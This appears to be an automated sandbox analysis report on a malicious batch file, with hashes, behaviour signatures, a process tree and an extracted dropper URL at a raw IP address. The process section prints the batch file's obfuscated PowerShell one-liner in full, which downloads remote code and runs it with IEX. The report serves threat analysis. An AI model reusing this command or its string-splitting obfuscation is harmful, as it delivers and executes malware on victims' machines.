Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
04/03/2025, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
cmd.bat
Resource
win7-20241010-en
5 signatures
150 seconds
General
-
Target
cmd.bat
-
Size
180B
-
MD5
b3cede4b5d517877a96f997ef702fb47
-
SHA1
a4aa92e6231e8ac310b32ecfd6d8f82f3b1c76af
-
SHA256
450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f
-
SHA512
5d7e73be8121dd8d3374d773d83f1fc553e748ef863a7fc7d914eecae8d1086dcb17dfc14a36ffd00456802af1f708ea19e8c8887203137c6ecf77c7f1239080
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://92.255.57.221/a.mp4
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2984 powershell.exe -
pid Process 2984 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2984 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2984 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2984 2780 cmd.exe 31 PID 2780 wrote to memory of 2984 2780 cmd.exe 31 PID 2780 wrote to memory of 2984 2780 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$FC1='ject Net.WebCli';$FC2='loadString(''http://92.255.57.221/a.mp4'')';$FC3='ent).Down';$FC4='(New-Ob';$E5=IEX ($FC4,$FC1,$FC3,$FC2 -Join '')|IEX"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984
-